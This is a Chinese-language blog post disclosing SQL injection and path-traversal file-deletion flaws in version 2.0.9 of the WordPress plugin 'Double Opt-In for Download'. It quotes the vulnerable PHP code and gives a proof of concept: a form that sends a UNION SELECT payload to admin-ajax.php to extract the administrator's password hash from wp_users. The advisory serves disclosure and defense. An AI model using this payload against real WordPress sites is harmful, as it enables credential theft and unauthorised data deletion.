AD

WP_'Double Opt-In for Download' _2.0.9_SQL 注入漏洞

插件主页

漏洞描述

问题1

$_POST[ 'id' ] id参数过滤不严格,populate_download_edit_form() 方法可以被所有注册用户调用。
页面地址: double-opt-in-for-download\public\class-doifd.php
add_action( 'wp_ajax_populate_download_edit_form', array( $this, 'populate_download_edit_form' ) );

public function populate_download_edit_form() {

    global $wpdb; // this is how you get access to the database

    if( isset( $_POST[ 'id' ] ) ) {

        $value = $_POST[ 'id' ];

        $download = $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}doifd_lab_downloads WHERE doifd_download_id = $value", ARRAY_A );
    }
    echo json_encode( $download );
    die(); // this is required to terminate immediately and return a proper response
}

问题2

$_REQUEST['id']参数过滤不严格
页面地址: double-opt-in-for-download\admin\includes\class-doifd-admin-download-table.php
$ids = isset ( $_REQUEST['id'] ) ? $_REQUEST['id'] : array ( ) ;
if ( is_array ( $ids ) )
    $ids = implode ( ',' , $ids ) ;

if ( ! empty ( $ids ) ) {
    $wpdb->query ( "DELETE FROM $table_name WHERE doifd_download_id IN($ids)" ) ;
}

问题3

$_REQUEST['doifd_file_name']下载文件名没有过滤,可以使用../../name.ext遍历所有文件。
漏洞所在页面: double-opt-in-for-download\admin\includes\class-doifd-admin-download-table.php
$file = isset ( $_REQUEST['doifd_file_name'] ) ? $_REQUEST['doifd_file_name'] : array ( ) ;
if ( is_array ( $file ) )
    $file = implode ( ',' , $file ) ;
$file = explode ( ',' , $file ) ;

foreach ( $file as $key=> $value ) {
    unlink ( DOIFD_DOWNLOAD_DIR . $value ) ;
}

POC

 wp-login.php?action=register页面进行注册,注册后登录。
name="xss" action="http://wp/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
      type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
      type="submit" value="Send">


评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略